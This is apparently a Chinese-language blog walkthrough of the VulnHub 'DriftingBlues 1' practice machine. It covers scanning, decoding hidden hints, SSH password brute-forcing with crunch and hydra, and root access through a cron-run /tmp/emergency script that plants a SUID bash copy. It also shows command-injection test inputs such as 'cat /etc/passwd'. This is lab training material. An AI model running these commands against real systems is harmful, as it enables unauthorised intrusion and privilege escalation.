目录
DriftingBlues_1
作者:0x5T4Rer
靶机信息
About Release 版本信息
Download 关于下载
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- driftingblues.ova (Size: 2.7 GB)
- Download (Mirror): https://download.vulnhub.com/driftingblues/driftingblues.ova
Description 描述
get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshooting or questions.
Networking 联网设置
打靶方式(思路)
注意:希望大家可以先按照靶机所用工具的思路进行打靶,若有问题再查看下一小节,打靶实录.
01_Nmap主机扫描
02_Netdiscover主机发现
03_Nikto漏洞扫描
04_解码网站
Base64 在线编码解码 | Base64 加密解密 - Base64.us base64在线解码
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org] ook在线解码网址
04_子域名&子目录扫描工具
- 01_Gobuster
- 02_Dirsearch
05_/etc/hosts
06_crunch字典生成
07_hydra暴力破解
靶机提示:多收集信息,需要耐心的查找靶机文件,本机存在作者打靶提示.
打靶实录(过程)
1 ==> 信息收集
ifconfig
获取kali攻击机IP地址
sudo netdiscover -r 1.1.1.0/24
-r range 指定扫描范围,此处为1.1.1.0/24 注意该参数只支持/8,/16和/24
结合以上信息,我们得到攻击机与靶机ip地址
kali ==> 1.1.1.128
靶机 ==> 1.1.1.130
注意:如果存在无法扫描到靶机的情况,只需要将靶机网卡删除再重新安装即可.
端口扫描
nmap --min-rate 10000 -p- 1.1.1.130
--min-rate 每秒发包数,此处为10000,即理论上每秒探测10000个端口
-p 进行端口扫描 -p-即为全端口扫描,也可以表示为 -p 1-65535
端口开放情况:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2 ==> 端口探测
sudo nmap -sT -sV -sC -O -p 22,80 1.1.1.130
-sT 以tcp协议进行扫描 tcp
-sV 探测各服务版本 version
-sC 用默认脚本进行扫描 script脚本
-O 探测操作系统版本
-p 指定端口,由于先前已经把相关端口扫描出来.所以不必全端口,这样也可以减少被发现的可能,提升扫描速度以及冲击力 此处端口为22,80
ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ca:e6:d1:1f:27:f2:62:98:ef:bf:e4:38:b5:f1:67:77 (RSA)
| 256 a8:58:99:99:f6:81:c4:c2:b4:da:44:da:9b:f3:b8:9b (ECDSA)
|_ 256 39:5b:55:2a:79:ed:c3:bf:f5:16:fd:bd:61:29:2a:b7 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Drifting Blues Tech
MAC Address: 00:0C:29:56:B7:04 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
- 1.暴力破解
- 2.私钥泄露
- 3.OpenSSH 7.2p2版本漏洞
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
inux 4.15 - 5.8 系统版本历史漏洞
由于nmap默认脚本未扫出相关漏洞,可以利用基础扫描工具进行再次扫描
此处介绍一些方便的基础漏洞扫描方式
nikto -host http://1.1.1.130
-host 指定要扫描的网站
英文界面:
Server: Apache/2.4.18 (Ubuntu)
The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
No CGI Directories found (use '-C all' to force check all possible dirs)
Server may leak inodes via ETags, header found with file /, inode: 1e1e, size: 5b63056704628, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
/css/: Directory indexing found.
/css/: This might be interesting.
/img/: Directory indexing found.
/img/: This might be interesting.
/icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
8046 requests: 0 error(s) and 10 item(s) reported on remote hos
中文翻译
+服务器:Apache/2.4.18(Ubuntu)
+/:防点击劫持X-Frame-Options标头不存在。看见https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+/:未设置X-Content-Type-Options标头。这可以允许用户代理以与MIME类型不同的方式呈现网站的内容。看见https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+找不到CGI目录(使用“-C all”强制检查所有可能的目录)
+/:服务器可能通过ETag泄漏索引节点,在文件/中找到头,索引节点:1e1e,大小:5b63056704628,时间:gzip。看见http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+Apache/2.4.18似乎已经过时(当前版本至少为Apache/2.4.54)。Apache2.2.34是2.x分支的EOL。
+OPTIONS:允许的HTTP方法:GET、HEAD、POST、OPTIONS。
+/css/:找到目录索引。
+/css/:这可能很有趣。
+/img/:找到目录索引。
+/img/:这可能很有趣。
+/icons/README:找到Apache默认文件。看见https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+8046个请求:远程主机上报告了0个错误和10个项目
sudo nmap --script=vuln -p22,80 1.1.1.130
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-sql-injection:
| Possible sqli for queries:
| http://1.1.1.130:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://1.1.1.130:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|_ http://1.1.1.130:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=1.1.1.130
| Found the following possible CSRF vulnerabilities:
|
| Path: http://1.1.1.130:80/
| Form id:
|_ Form action: #
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
MAC Address: 00:0C:29:56:B7:04 (VMware)
3 ==> 漏洞挖掘&利用
进入页面,发现是一个类似公司官网界面
sheryl@driftingblues.box
eric@driftingblues.box
此时我们在该页面获取到了两个邮箱,driftingblues.box疑似网站,尝试打开,无响应,先看看其他功能点
发现邮箱输入后会在网址后回显为域名 http://1.1.1.130/?email=1111%40qq.com#,先看是否会进入到源代码中,如果可以操控,将造成xss漏洞,后面发现存在前端验证,必须要有@字符才能发送,但是可以直接修改域名
尝试如下
http://1.1.1.130/?email=cat+/etc/passwd# 命令执行
http://1.1.1.130/?email=www.baidu.com# ssrf,url跳转
搜索字段后发现并没有回显到源代码中,因此不存在但是发现奇怪的注释
<!-- L25vdGVmb3JraW5nZmlzaC50eHQ= --> 猜测为base64编码
利用kali自带的工具进行base64解码
echo 'L25vdGVmb3JraW5nZmlzaC50eHQ='| base64 -d
解码结果:
/noteforkingfish.txt
判断为网站目录,尝试访问 http://1.1.1.130/noteforkingfish.txt
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook. Ook? Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook! Ook! Ook? Ook! Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook.
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org] ook在线解码网址
英文:
my man, i know you are new but you should know how to use host file to reach our secret location. -eric
中文:
我的伙计,我知道你是新来的,但你应该知道如何使用主机文件到达我们的秘密位置-埃里克
获得了作者给的提示,利用主机文件访问网站,这个时候我们想起一开始没办法访问的driftingblues.box
kali系统的主机文件位置位于/etc/hosts,我们尝试对其进行编辑,注意,编辑该文件通常需要root权限
在没有域名服务器的情况下,系统上的所有网络程序都通过查询该文件来解析对应于某个主机名的IP地址,否则就需要使用DNS服务程序来解决。通常可以将常用的域名和IP地址映射加入到hosts文件中,实现快速方便的访问。
sudo vi /etc/hosts
在127.0.0.1 kali下面以相同格式添加1.1.1.130 driftingblues.box
注意,编辑之前按 i 打开编辑模式
然后按 ESC :wq 回车 退出编辑
write 写入
quit 退出
访问发现并没有效果,猜测可能是存在子域名,利用gobuster
gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
发现存在 test.driftingblues.box 和 Test.driftingblues.box,重新修改并访问 test.driftingblues.box
页面回显work in progress -eric 并且无其他回显,尝试子目录爆破
dirsearch -u http://test.driftingblues.box
访问状态为200的目录 http://test.driftingblues.box/robots.txt
访问不允许访问的页面 http://test.driftingblues.box/ssh_cred.txt
英文
we can use ssh password in case of emergency. it was "1mw4ckyyucky".
sheryl once told me that she added a number to the end of the password.
-db
中文
在紧急情况下,我们可以使用ssh密码。这是“1mw4ckyyucky”。
谢丽尔曾经告诉我,她在密码末尾加了一个数字。
-数据库
从中我们知道了ssh密码为1mw4ckyyucky*,尝试利用字典生成工具对生成
crunch 13 13 -t 1mw4ckyyucky% > 1.txt
% 数字通配符
-t 指定生成文本
cat 1.txt
利用工具对ssh服务进行爆破,由于先前网站首页留言,我们猜测ssh用户名为eric
hydra -l eric -P 1.txt ssh://1.1.1.130
[22][ssh] host: 1.1.1.130 login: eric password: 1mw4ckyyucky6
4 ==> 获取靶机立足点
已知账户密码,我们尝试对ssh进行登录
ssh eric@1.1.1.130
搜集靶机基础信息,意外拿下flag1/2
继续搜集靶机信息,猜测另一个flag应该是在/root目录下,寻找提权方案
5 ==> 提权
sudo -l执行失败,猜测进行权限限制了
利用uname -a查找内核信息,搜寻内核提权的可能 但是该方案对机器影响很大,我们尽量使用其他方案
查找拥有管理员权限的文件路径
find / -user root -perm -4000 -print 2>/dev/null
查看计划任务,假如权限设定不当,直接使用777权限,给了写入命令的权限,我们将可以利用计划任务获取管理员权限
cat /etc/crontab
可惜没有写入权限
决定还是继续查看靶机中的文件,寻找作者的指引,最终在 /var/backups/backup.sh 发现了作者的提示
#!/bin/bash
/usr/bin/zip -r -0 /tmp/backup.zip /var/www/
/bin/chmod
#having a backdoor would be nice # 有后门就好了
sudo /tmp/emergency
该脚本会以root权限自动执行/tmp/emergency,意味着我们只需要在该文件写入提权指令即可,进入/tmp目录
并没有发现emergency文件,我们可以自己创建该文件
echo "cp /bin/bash /tmp/getroot&&chmod +xs /tmp/getroot" > emergency
chmod +x emergency
尝试运行/var/backups/back.up,发现没权限运行
后来发现该文件似乎会自动运行,在一段时间后,访问/tmp,发现出现了后门文件getroot
cd /tmp
ls
./getroot -p
whoami
获得root权限,查看root.txt
拿下最后一个flag
打靶总结
总体来说是一台十分简单的靶机,虽然过程略有繁琐,但一步步只需要按照作者指引即可拿到全部flag,我们需要更加细心的观察页面信息,耐心的寻找作者给予的提示,还要对一些基础的编码有所了解,同时熟悉linux一些基础操作,那么,该台靶机打靶就此结束,希望我们共同进步,一起练习更扎实的渗透技能.
扫一扫
2498
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
